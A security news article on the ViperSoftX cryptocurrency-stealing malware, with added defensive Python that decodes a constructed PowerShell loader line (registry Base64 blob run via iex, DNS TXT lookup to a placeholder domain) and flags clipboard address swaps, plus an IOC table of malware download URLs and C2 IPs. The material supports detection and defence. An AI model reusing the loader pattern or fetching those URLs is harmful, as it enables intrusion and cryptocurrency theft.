ViperSoftX Malware Used by Threat Actors to Steal Sensitive Information
The AhnLab Security Intelligence Center (ASEC) has recently issued a detailed report confirming the persistent distribution of ViperSoftX malware by threat actors, with notable impact on users in South Korea and beyond.
First identified by Fortinet in 2020, ViperSoftX is a PowerShell-based malware that establishes a foothold on infected systems, executes commands received from its operators, and steals sensitive data, with a particular focus on cryptocurrency-related information.
Ongoing Threat Targets Cryptocurrency Users Globally
Disguised as cracked software, key generators, or even eBooks on torrent sites, as reported by Avast (2022), Trend Micro (2023), and Trellix (2024), this malware employs deceptive initial access tactics to ensnare unsuspecting victims worldwide.
Cracked and pirated software remains a prevalent infection vector across the cybercriminal ecosystem, which amplifies the reach of ViperSoftX and accounts for the breadth of its infections.
ViperSoftX demonstrates remarkable persistence through the abuse of Windows Task Scheduler to execute malicious PowerShell scripts periodically.

These scripts, typically obfuscated or Base64-encoded (not encrypted), are concealed in files disguised as logs or stored in registry values such as "HKLM\SOFTWARE\HPgs6ZtP670 / xr417LXh", and act as downloaders for additional payloads.
These downloaders fetch further malware from command-and-control (C&C) servers using techniques like DNS TXT record queries to dynamically crafted domains.
Once deployed, ViperSoftX communicates with its C&C server via HTTP headers such as “X-User-Agent” and “X-notify,” transmitting detailed system information including computer name, Windows version, and installed antivirus data.
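The persistence and loader chain described above (a scheduled task that launches an encoded PowerShell command, which in turn reads a Base64 blob from the registry, executes it and talks to C&C over DNS TXT records) can be triaged offline from an exported task definition. What follows is an added example written for this page, not code from ASEC or from the malware: it parses a constructed task definition in the layout `schtasks /query /xml` exports, decodes the `-EncodedCommand` argument (Base64 of UTF-16LE text), and scores the result against the behaviours the report names. The registry path, domain, script contents and interval are constructed placeholders, not indicators from the report.

```python
import base64
import re
import xml.etree.ElementTree as ET
from typing import Optional

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed stage-1 script with the shape the report describes: read a Base64
# blob from a registry value, decode and execute it, then query a DNS TXT record.
# The registry path and domain are placeholders, not real indicators.
STAGE1 = (
    "$v = (Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\Example' -Name 'Blob').Blob; "
    "iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($v))); "
    "Resolve-DnsName -Type TXT example.invalid"
)


def encode_powershell(script: str) -> str:
    """powershell.exe -EncodedCommand takes Base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed task definition in the layout `schtasks /query /xml` exports.
SAMPLE_TASK_XML = f"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT30M</Interval></Repetition>
      <StartBoundary>2025-01-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-NoProfile -WindowStyle Hidden -EncodedCommand {encode_powershell(STAGE1)}</Arguments>
    </Exec>
  </Actions>
</Task>"""

# -EncodedCommand and the abbreviations powershell.exe accepts, then the Base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Behaviours from the report, as patterns over the argument string plus decoded script.
INDICATORS = {
    "reads script from registry": re.compile(r"Get-ItemProperty|HK(?:LM|CU):", re.I),
    "decodes Base64 at runtime": re.compile(r"FromBase64String", re.I),
    "executes decoded text": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "DNS TXT lookup for C2": re.compile(r"Resolve-DnsName[^|;]*-Type\s+TXT|nslookup[^|;]*-type=txt", re.I),
    "hidden window": re.compile(r"-WindowStyle\s+Hidden|-w\s+hidden", re.I),
    "custom C2 headers": re.compile(r"X-User-Agent|X-notify", re.I),
}


def decode_encoded_command(arguments: str) -> Optional[str]:
    """Return the plaintext script behind -EncodedCommand, or None if absent or invalid."""
    m = ENC_FLAG.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_task_xml(xml_text: str) -> dict:
    """Extract the action and repetition interval from a task definition and score it."""
    root = ET.fromstring(xml_text)
    exec_node = root.find(".//t:Exec", TASK_NS)
    if exec_node is None:
        return {"command": "", "interval": "", "decoded_script": None, "indicators": []}
    command = exec_node.findtext("t:Command", default="", namespaces=TASK_NS)
    arguments = exec_node.findtext("t:Arguments", default="", namespaces=TASK_NS)
    interval = root.findtext(".//t:Repetition/t:Interval", default="", namespaces=TASK_NS)
    script = decode_encoded_command(arguments)
    scan_text = arguments + "\n" + (script or "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(scan_text)]
    return {
        "command": command.strip(),
        "interval": interval,
        "decoded_script": script,
        "indicators": hits,
    }


if __name__ == "__main__":
    result = triage_task_xml(SAMPLE_TASK_XML)
    print("command:   ", result["command"])
    print("interval:  ", result["interval"])
    print("decoded:   ", result["decoded_script"])
    print("indicators:", ", ".join(result["indicators"]))
```

On a live host the same function can be fed the output of `schtasks /query /tn "<task name>" /xml` for each task; a repeating interval combined with a hidden, encoded PowerShell action that reads the registry or resolves TXT records is the combination worth escalating, since any one of those on its own has legitimate uses.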
Payload Delivery Mechanisms
Beyond data exfiltration, it monitors clipboard activity to steal BIP39 recovery phrases and cryptocurrency wallet addresses for coins like BTC, ETH, and SOL, while also employing a clipboard protection mechanism to thwart competing ClipBanker malware by terminating suspicious processes.
Additionally, ViperSoftX enumerates installed programs and the extensions installed in browsers such as Chrome, Firefox, and Edge, relaying this information to the threat actors for further exploitation.
Its capabilities extend to executing commands, downloading executables, and even self-removal to evade detection.
The malware's arsenal includes secondary payloads such as Quasar RAT, an open-source remote access Trojan written in .NET, alongside commercial tools such as PureCrypter, a packer used to deliver additional payloads, and PureHVNC, a hidden-VNC remote control tool.

These tools enable comprehensive control over infected systems, keylogging, and credential theft.
Moreover, ViperSoftX often deploys ClipBanker, which hijacks cryptocurrency wallet addresses on the clipboard and replaces them with attacker-controlled ones during transactions, a tactic that exploits the length and randomness of wallet addresses, which users typically copy and paste rather than check character by character.
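The clipboard activity in the two paragraphs above, both the harvesting side (recognising wallet addresses and BIP39 recovery phrases) and the ClipBanker swap, comes down to pattern matching on clipboard text. The following is an added example written for this page, not ASEC's code or the malware's: it applies the same address and phrase recognition a clipboard monitor would use, then turns it around into a defensive check that flags an address being silently replaced between two clipboard samples. The addresses, the timeline and the 24-word wordlist subset are constructed for the example.

```python
import re
from typing import Optional

# Syntactic address checks for the coins the report names. These test prefix,
# alphabet and length only; a wallet would additionally verify the checksum
# (Base58Check, bech32, EIP-55), which this example deliberately leaves out.
BASE58 = r"[1-9A-HJ-NP-Za-km-z]"
ADDRESS_PATTERNS = {
    "ETH": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "BTC": re.compile(r"^(?:[13]" + BASE58 + r"{25,34}|bc1[02-9ac-hj-np-z]{39,59})$"),
    "SOL": re.compile(r"^" + BASE58 + r"{32,44}$"),
}

# First 24 words of the English BIP39 list, a constructed stand-in for the full
# 2048-word list a real check would load.
SAMPLE_BIP39_WORDS = set(
    "abandon ability able about above absent absorb abstract absurd abuse "
    "access accident account accuse achieve acid acoustic acquire across act "
    "action actor actress actual".split()
)
BIP39_LENGTHS = {12, 15, 18, 21, 24}


def classify_address(text: str) -> Optional[str]:
    """Name the coin whose address shape the text matches, or None."""
    text = text.strip()
    # ETH and BTC are tested first: a legacy BTC address of 32 or more characters
    # also fits the SOL shape, and this ordering resolves that overlap.
    for coin in ("ETH", "BTC", "SOL"):
        if ADDRESS_PATTERNS[coin].match(text):
            return coin
    return None


def looks_like_bip39(text: str, wordlist: set) -> bool:
    """True for a 12/15/18/21/24-word phrase drawn entirely from the wordlist."""
    words = text.strip().lower().split()
    return len(words) in BIP39_LENGTHS and all(w in wordlist for w in words)


def detect_swap(copied: str, pasted: str) -> Optional[str]:
    """Compare what the user copied with what is about to be pasted. A ClipBanker
    keeps the replacement plausible (same coin, same shape), so the reliable tell
    is simply that the two addresses differ."""
    src, dst = classify_address(copied), classify_address(pasted)
    if src is None or dst is None:
        return None
    if copied.strip() != pasted.strip():
        return f"{src} address replaced by a different {dst} address"
    return None


def audit_clipboard(snapshots, window_s: float = 2.0) -> list:
    """Walk (seconds, clipboard text) samples, as a clipboard monitor would, and
    flag an address replaced within window_s plus any recovery phrase seen."""
    alerts = []
    for i, (t1, after) in enumerate(snapshots):
        if i > 0:
            t0, before = snapshots[i - 1]
            if t1 - t0 <= window_s:
                msg = detect_swap(before, after)
                if msg:
                    alerts.append(f"t={t1:.1f}s: {msg}")
        if looks_like_bip39(after, SAMPLE_BIP39_WORDS):
            alerts.append(f"t={t1:.1f}s: recovery phrase observed on the clipboard")
    return alerts


# Constructed clipboard timeline with synthetic, obviously non-real addresses.
USER_ETH = "0x" + "ab" * 20
ATTACKER_ETH = "0x" + "cd" * 20
SAMPLE_TIMELINE = [
    (0.0, "meeting notes"),
    (1.0, USER_ETH),       # user copies their own address
    (1.5, ATTACKER_ETH),   # replaced half a second later with no user action
    (9.0, "abandon ability able about above absent absorb abstract absurd abuse access accident"),
]

if __name__ == "__main__":
    for line in audit_clipboard(SAMPLE_TIMELINE):
        print(line)
```

The swap check is the part a user or wallet front end can act on: the malware's replacement passes every format test, so the only defence at paste time is comparing the pasted value against the one actually copied, and the audit function shows how short the window between the two events is.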
ASEC warns that an infection can lead to total system compromise, allowing attackers to extract not only cryptocurrency data but also a wide array of user information.
To mitigate the risk, users are urged to avoid downloading software from unverified or suspicious sources, apply the latest security patches, and keep antivirus solutions such as AhnLab's V3 products up to date so that known attack vectors are blocked.
Indicators of Compromise (IOCs)
Type | Value
---|---
MD5 | 064b1e45016e8a49eba01878e41ecc37
MD5 | 0ed2d0579b60d9e923b439d8e74b53e1
MD5 | 0efe1a5d5f4066b7e9755ad89ee9470c
MD5 | 197ff9252dd5273e3e77ee07b37fd4dd
MD5 | 1ec4b69f3194bd647639e6b0fa5c7bb5
URL | http://136.243.132.112/ut.exe
URL | http://136.243.132.112:881/3.exe
URL | http://136.243.132.112:881/APPDATA.exe
URL | http://136.243.132.112:881/a.ps1
URL | http://136.243.132.112:881/firefoxtemp.exe
IP | 136.243.132.112
IP | 160.191.77.89
IP | 185.245.183.74
IP | 212.56.35.232
IP | 89.117.79.31